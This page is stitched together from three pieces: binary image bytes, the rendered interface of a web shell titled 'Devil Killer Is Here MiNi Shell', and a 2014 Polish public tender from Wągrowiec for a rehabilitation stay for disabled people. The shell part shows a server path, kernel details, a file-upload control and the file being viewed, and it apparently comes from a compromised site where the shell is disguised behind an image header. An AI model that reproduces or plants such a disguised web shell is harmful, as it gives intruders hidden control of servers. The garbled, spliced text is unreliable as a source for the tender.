JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140812/268984-N-2014.html

<p class="kh_header"><b>Wągrowiec: Organizacja i przeprowadzenie 14 dniowego turnusu rehabilitacyjnego z elementami nauki niezależnego funkcjonowania z niepełnosprawnością dla osób niepełnosprawnych będących beneficjentami projektu partnerskiego systemowego pn.Rozwój  i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc osobom usamodzielnianym</b><br>
<b>Numer ogłoszenia: 268984 - 2014; data zamieszczenia: 12.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Wierzbowa 1, 62-100 Wągrowiec, woj. wielkopolskie, tel. 67 26 27 614, faks 67 26 27 614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.wagrowiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pcpr.wagrowiec.pl ; www.bip.wagrowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie 14 dniowego turnusu rehabilitacyjnego z elementami nauki niezależnego funkcjonowania z niepełnosprawnością dla osób niepełnosprawnych będących beneficjentami projektu partnerskiego systemowego pn.Rozwój  i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc osobom usamodzielnianym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia  14 dniowego turnusu rehabilitacyjnego z elementami nauki niezależnego funkcjonowania                                      z niepełnosprawnością dla osób niepełnosprawnych i ich opiekunów -  beneficjentów projektu partnerskiego systemowego pn. Rozwój i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc osobom usamodzielnianym realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Wągrowcu, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
Szczegółowy opis przedmiotu zamówienia
Wymagania szczegółowe dotyczące Ośrodka:  
Organizator i Ośrodek, w którym będzie odbywał się turnus musi spełniać wymogi określone z Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych w szczególności w § 8 ust. 1 rozporządzenia.  
Zawiadomienie o wpisie do rejestru powinno zawierać informację o rodzajach 
realizowanych turnusów rehabilitacyjnych w którym będą uczestniczyć osoby                              
z następującymi dysfunkcjami lub schorzeniami:   z upośledzeniem umysłowym, z chorobą psychiczną, z zaburzeniami głosu i mowy, z dysfunkcją narządu słuchu, 
z dysfunkcją narządu wzroku, z dysfunkcją narządu ruchu, poruszających się na wózkach inwalidzkich, z dysfunkcją narządu ruchu, z wyłączeniem osób poruszających się na wózkach  inwalidzkich, z epilepsją, ze schorzeniami układu oddechowego, ze schorzeniami układu krążenia, z chorobami układu pokarmowego, 
z chorobami układu moczowo-płciowego, ze schorzeniami kręgosłupa,z chorobami neurologicznymi, ze schorzeniami endokrynologicznymi, ze schorzeniami metabolicznymi, z chorobami układu krwiotwórczego, z cukrzycą, dla kobiet po mastektomii. 
Każdy pokój w ośrodku winien posiadać pełny węzeł sanitarny (umywalkę, prysznic lub wannę, wc). 
Każdy pokój winien być wyposażony w TV i oddzielne łóżka. 
Na terenie ośrodka winna znajdować się baza zabiegowa, minimum gabinet fizykoterapii, hydroterapii, laseroterapii, rehabilitacji dla kobiet po mastektomii.
Minimum dwa pokoje 2 osobowe winny być dostosowane dla osób  niepełnosprawnych poruszających się na wózkach inwalidzkich. 
Ośrodek na swoim terenie winien posiadać stołówkę. 
Na terenie ośrodka winno znajdować się miejsce do zorganizowania zajęć sportowo - rekreacyjnych.  
Ośrodek winien posiadać na swoim terenie basen kryty z podgrzewaną wodą, 
Przy ośrodku winno znajdować się wyznaczone miejsce do zorganizowania ogniska, posiadające miejsce do siedzenia dla każdego uczestnika wyjazdu. 
Ośrodek winien zapewnić uczestnikom w trakcie pobytu opiekę lekarską i pielęgniarską  oraz opiekę ratownika na basenie. 
Ośrodek winien zapewnić obsługę sprzątająco - porządkową dla utrzymania czystości w pokojach i węzłach sanitarnych oraz innych pomieszczeniach, z których będą korzystać  uczestnicy. 
Ośrodek winien być dostosowany do osób niepełnosprawnych, w tym do osób 
poruszających się na wózkach inwalidzkich. 
Wymogi co do wyżywienia: 
Całodzienne wyżywienie ( śniadanie - szwedzki bufert, obiad dwudaniowy z deserem, napojem, kolacja - szwedzki bufet, nieograniczony dostęp do wody mineralnej). Wyżywienie musi uwzględniać konieczność zastosowania diety w przypadku zgłoszenia jej przez uczestnika turnusu najpóźniej w dniu przyjazdu do Ośrodka.
Wymogi co do noclegu: 
Nocleg w pokojach maksymalnie 2-osobowych z odrębnymi łóżkami. Pokoje typu komfort z łazienką i WC. Minimum 2 pokoje 2 osobowe winny być dostosowane dla osób niepełnosprawnych poruszających się na wózkach inwalidzkich. Łazienki wyposażone  w nim. dwa ręczniki dla każdej osoby, wymiana ręczników przez okres trwania turnusu.
Atrakcje dodatkowe: 
Organizator zapewni zabiegi rehabilitacyjne, zajęcia specjalistyczne związane z rodzajem turnusu i uwzględnieniem rodzaju niepełnosprawności osób biorących w nim udział. Organizator powinien zorganizować uczestnikom na terenie ośrodka minimum jeden wieczór grillowy, z co najmniej jednym daniem gorącym i gorącymi napojami.Organizator zapewni łączny czas zorganizowanych zajęć indywidualnych i grupowych  w wymiarze nie mniejszym niż 6 godzin dziennie.
W ramach 14 dniowego turnusu rehabilitacyjnego Organizator zapewni: 
Opiekuna dla grupy przez cały czas trwania turnusu,
minimum trzy wieczorki integracyjne  w okresie pobytu na turnusie z zapewnieniem poczęstunku: ciasto, kawa, herbata, napoje.
jednodniową wycieczkę do miejscowości atrakcyjnej turystycznie zapewniając transport, bilety wstępu w cenie nie niższej niż 80 zł od osoby
Do dyspozycji uczestników turnusu należy udostępnić nieodpłatnie: 
salę szkoleniową dla 24 osób niepełnosprawnych, wyposażoną w niezbędne meble, urządzenia w tym sprzęt multimedialny,  codziennie  w godz. od 10.00 - 22.00
basen z zapewnioną opieką ratownika w wymiarze min 1,5h dziennie - codziennie.
miejsce do prowadzenia zajęć sportowych - sala sportowa wyposażona w sprzęt do ćwiczeń - min 2 razy w tygodniu,
Warsztaty kompetencji i umiejętności społecznych
Wykonawca przeprowadzi warsztaty kompetencji i umiejętności społecznych dla 24 osób niepełnosprawnych w wymiarze  co najmniej 20h zegarowych ( godzina zegarowa obejmuje 45 minut zajęć i 15 minut przerwy).
Program warsztatów powinien obejmować między innymi zagadnienia:
kontakty interpersonalne, integracja, bariery
zmiana nawyków, radzenie  sobie w trudnych sytuacjach
niesprawny - sprawny, relacje, oczekiwania, problemy, mocne strony
asertywność - sztuka bycia sobą
twórcza aktywność i wyrażanie siebie.
Warsztaty powinny być zorganizowane w terminach, kiedy nie są prowadzone zabiegi rehabilitacyjne lub inne zajęcia przewidziane dla beneficjentów w trakcie pobytu na turnusie rehabilitacyjnym. 
Ponadto Wykonawca zapewni specjalistę - psycholog z wykształceniem wyższym psychologicznym, materiały szkoleniowe: notatnik A-4 + długopis opatrzone w logo UE oraz POKL, niezbędne wzory logotypów dostarczy Zamawiający,
zaświadczenia ukończenia warsztatu, zaświadczenia winny być opatrzone logotypami UE oraz POKL, przeprowadzenie badania ankietowego na zakończenie uczestnictwa w turnusie, ankieta winna dotyczyć wszystkich punktów programu turnusu, w tym dojazdu na turnus. Wzór ankiety opracowany zostanie przez Wykonawcę i zatwierdzony przez Zamawiającego dokumentację fotograficzną z przeprowadzonego turnus na płycie DVD, uwzględniającą co najmniej jedno zdjęcie dla każdego uczestnika turnusu z zabiegów rehabilitacyjnych, co najmniej 20 zdjęć grupowych, w tym na terenie Ośrodka, w trakcie transportu, z udziału w warsztatach kompetencji, udziału w spotkaniach integracyjnych, wieczorkach, dodatkowych atrakcjach. Dokumentacja fotograficzna musi potwierdzać realizację każdego punktu programu pobytu na turnusie. 
Uczestnicy turnusu:  
Uczestnikami turnusu będą 24 osoby niepełnosprawne, w tym 2 osoby poruszające się na wózku inwalidzkim oraz 9 opiekunów osób niepełnosprawnych. Łącznie 33 osoby. Liczba uczestników i opiekunów może ulec zmianie. 
Transport: Wykonawca zapewni transport autokarem o podwyższonym standardzie dla 33 osób, w tym 24 osób niepełnosprawnych i 9 opiekunów, w tym dwie osoby poruszające się na wózku inwalidzkim. Transport musi uwzględniać pojazd dostosowany do przewozu osób poruszających się na wózku inwalidzkim. Transport dotyczy dowozu beneficjentów na turnus rehabilitacyjny na trasie Wągrowiec, ul. Wierzbowa 1 - siedziba Ośrodka, siedziba Ośrodka - Wągrowiec, ul. Wierzbowa 1.
Termin i miejsce wyjazdu - 8.09.2014r. siedziba PCPR ul. Wierzbowa 1. Wykonawca zapewni opiekuna grupy od dnia wyjazdu na turnus rehabilitacyjny do dnia powrotu z turnusu rehabilitacyjnego. 
Ubezpieczenie uczestników: Wykonawca pokryje koszty ubezpieczenia uczestników  turnusów od pierwszego dnia pobytu na turnusie rehabilitacyjnym, na kwotę nie mniejszą niż 10 tyś. zł na każdą osobę biorącą udział w turnusie. Polisa zostanie dostarczona Zamawiającemu najpóźniej w dniu rozpoczęcia turnusu. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego z uczestnictwem w turnusie. Ponadto Wykonawca pokryje koszt opłaty klimatycznej.
Obowiązki i czynności związane z realizacją turnusu rehabilitacyjnego: 
Wykonawca niezwłocznie zawiadomi zamawiającego o każdym przypadku przerwania  turnusu rehabilitacyjnego przez jego uczestnika,
Wykonawca przeprowadzi badanie lekarskie dla 24 osób niepełnosprawnych - uczestników turnusu,  zakończone wskazaniem zabiegów leczniczych,
Wykonawca zapewni przeprowadzenie minimum trzech zabiegów fizjoterapeutycznych  dziennie dla jednej osoby niepełnosprawnej będącej uczestnikiem turnusu, wg zaleceń  lekarza ośrodka, w każdym dniu turnusu rehabilitacyjnego,
Wykonawca wystawi na Zamawiającego w terminie do 30 dni po zakończeniu turnusu rehabilitacyjnego imienną fakturę na każdego uczestnika turnusu, określającą kwotę dofinansowaną ze środków PFRON (faktura 1), jedną zbiorczą fakturę wystawioną na Zamawiającego określającą wysokość środków  EFS (faktura 2) 
Przesłanie Zamawiającemu w terminie do 30 dni od zakończenia turnusu faktur,   
Karty informacyjnej o przebiegu turnusu rehabilitacyjnego, zaświadczeń o uczestnictwie   w warsztatach kompetencji społecznej, dokumentacji fotograficznej z przebiegu turnusu na płycie DVD
Wykonawca określi po przebytym turnusie u każdej osoby niepełnosprawnej będącej  uczestnikiem turnusu, efekt (rezultat) podwyższenia poziomu funkcjonowania jej w  życiu  codziennym i integracji. Informację taką należy zawrzeć w Karcie informacyjnej o przebiegu turnusu  
Zamawiający w trosce o należyte wykonanie zamówienia, zastrzega sobie prawo do kontroli realizacji przedmiotu zamówienia w miejscu prowadzenia turnusu rehabilitacyjnego, z zapewnieniem noclegu i wyżywienia na poziomie określonym jak dla uczestników turnusu rehabilitacyjnego, dla co najmniej 2 osób przez dwie doby..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 85.14.00.00-2, 80.00.00.00-9, 55.27.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 08.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Organizator i Ośrodek, w którym będzie odbywał się turnus musi spełniać wymogi określone z Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych w szczególności w § 8 ust. 1 rozporządzenia.  Posiadanie aktualnych wpisów do rejestrów organizatorów turnusów rehabilitacyjnych, w których mogą uczestniczyć osoby niepełnosprawne korzystające z dofinansowania ze środków PFRON oraz rejestru ośrodków. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia - zgodnie z SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia do wykonania zamówienia -Wykonanie w ciągu 
ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie, co najmniej dwóch usług o tożsamej  tematyce o wartości nie mniejszej niż 30 tysięcy złotych brutto. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia - zgodnie z SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pisemne oświadczenie Wykonawcy podpisane przez osoby upoważnione, że posiada potencjał techniczny do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pisemne oświadczenie Wykonawcy podpisane przez osoby upoważnione, że posiada osoby zdolne do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie aktualnego opłaconego w całości ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 100 tysięcy zł. oraz nie podlegają wykluczeniu na podstawie ustawy - Prawo zamówień publicznych. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia- nie spełnia, w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykaz wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert - załącznik nr 4 do SIWZ. Oświadczenie potwierdzające zgodność wymagań wobec ośrodka, jakich spełnienia oczekuje Zamawiający - załącznik nr 5 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy wypełniony i podpisany przez Wykonawcę - załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru w sytuacji gdy: a) konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, b) zmiany te są korzystne dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.wagrowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, ul. Wierzbowa 1, 62-100 Wągrowiec, pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2014 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, ul. Wierzbowa 1, 62-100 Wągrowiec, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




